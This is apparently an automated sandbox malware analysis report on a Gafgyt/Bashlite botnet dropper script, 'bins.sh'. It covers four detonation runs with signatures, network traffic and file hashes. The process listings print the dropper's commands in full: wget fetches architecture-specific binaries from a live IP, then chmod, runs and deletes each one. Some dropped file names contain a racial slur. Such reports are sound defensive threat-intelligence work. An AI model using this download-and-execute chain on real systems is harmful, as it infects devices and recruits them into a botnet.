Malware Analysis Report

2025-08-11 07:22

Sample ID 240803-fhdwbstfkl
Target bins.sh
SHA256 de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
Tags
gafgyt botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3

Threat Level: Known bad

The file bins.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet

Detected Gafgyt variant

Gafgyt/Bashlite

Executes dropped EXE

Reads system routing table

Reads system network configuration

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-03 04:52

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-03 04:52

Reported

2024-08-03 04:54

Platform

debian9-mipsbe-20240418-en

Max time kernel

92s

Max time network

16s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-03 04:52

Reported

2024-08-03 04:54

Platform

debian9-mipsel-20240729-en

Max time kernel

92s

Max time network

14s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs2 N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/boobs2 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-03 04:52

Reported

2024-08-03 04:54

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

103s

Max time network

128s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/roof N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/roof N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
GB 195.181.164.14:443 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-03 04:52

Reported

2024-08-03 04:54

Platform

debian9-armhf-20240611-en

Max time kernel

101s

Max time network

17s

Command Line

[/tmp/bins.sh]

Signatures

Detected Gafgyt variant

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/boobs /tmp/boobs N/A
N/A /tmp/boobs2 /tmp/boobs2 N/A
N/A /tmp/roof /tmp/roof N/A
N/A /tmp/ppc /tmp/ppc N/A
N/A /tmp/sparc /tmp/sparc N/A
N/A /tmp/darkness /tmp/darkness N/A
N/A /tmp/arm5 /tmp/arm5 N/A
N/A /tmp/arm6 /tmp/arm6 N/A
N/A /tmp/NIGGA7 /tmp/NIGGA7 N/A

Reads system routing table

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/darkness N/A
File opened for reading /proc/net/route /tmp/arm5 N/A
File opened for reading /proc/net/route /tmp/arm6 N/A
File opened for reading /proc/net/route /tmp/NIGGA7 N/A

Reads system network configuration

Description Indicator Process Target
File opened for reading /proc/net/route /tmp/darkness N/A
File opened for reading /proc/net/route /tmp/arm5 N/A
File opened for reading /proc/net/route /tmp/arm6 N/A
File opened for reading /proc/net/route /tmp/NIGGA7 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boobs /usr/bin/wget N/A
File opened for modification /tmp/roof /usr/bin/wget N/A
File opened for modification /tmp/ppc /usr/bin/wget N/A
File opened for modification /tmp/arm6 /usr/bin/wget N/A
File opened for modification /tmp/boobs2 /usr/bin/wget N/A
File opened for modification /tmp/sparc /usr/bin/wget N/A
File opened for modification /tmp/darkness /usr/bin/wget N/A
File opened for modification /tmp/arm5 /usr/bin/wget N/A
File opened for modification /tmp/NIGGA7 /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/usr/bin/wget

[wget http://93.123.85.216/boobs]

/bin/chmod

[chmod +x boobs]

/tmp/boobs

[./boobs]

/bin/rm

[rm -rf boobs]

/usr/bin/wget

[wget http://93.123.85.216/boobs2]

/bin/chmod

[chmod +x boobs2]

/tmp/boobs2

[./boobs2]

/bin/rm

[rm -rf boobs2]

/usr/bin/wget

[wget http://93.123.85.216/roof]

/bin/chmod

[chmod +x roof]

/tmp/roof

[./roof]

/bin/rm

[rm -rf roof]

/usr/bin/wget

[wget http://93.123.85.216/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://93.123.85.216/sparc]

/bin/chmod

[chmod +x sparc]

/tmp/sparc

[./sparc]

/bin/rm

[rm -rf sparc]

/usr/bin/wget

[wget http://93.123.85.216/darkness]

/bin/chmod

[chmod +x darkness]

/tmp/darkness

[./darkness]

/bin/rm

[rm -rf darkness]

/usr/bin/wget

[wget http://93.123.85.216/arm5]

/bin/chmod

[chmod +x arm5]

/tmp/arm5

[./arm5]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://93.123.85.216/arm6]

/bin/chmod

[chmod +x arm6]

/tmp/arm6

[./arm6]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://93.123.85.216/NIGGA7]

/bin/chmod

[chmod +x NIGGA7]

/tmp/NIGGA7

[./NIGGA7]

/bin/rm

[rm -rf NIGGA7]

Network

Country Destination Domain Proto
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp
NL 93.123.85.216:80 93.123.85.216 tcp
NL 93.123.85.216:39 tcp

Files

/tmp/boobs

MD5 1f918589efbef4b04e806b7a38fc63f8
SHA1 758f7a47b66a52ce59462ffd1c0f223af618077c
SHA256 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4
SHA512 d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb

/tmp/boobs2

MD5 348a8f1c5535fe6a0a698f457c329485
SHA1 a3415c48c1d18776ab9a02ef23fe65cef88af354
SHA256 c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8
SHA512 e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c

/tmp/roof

MD5 ca477454b7145f6d2180e32c6f0135f6
SHA1 da25e63ea1e5fed9abf321ddf4a82eaa76717bb6
SHA256 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4
SHA512 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80

/tmp/ppc

MD5 5cf85a36699cca11be8c96c3232654e0
SHA1 897379599414d22c9adf9b542266eb6b888b6542
SHA256 d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419
SHA512 de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552

/tmp/sparc

MD5 0e2c431d0b76d5d91af24cd90532cd93
SHA1 402554d878c7e73cdf145bb249c604a21e465e1f
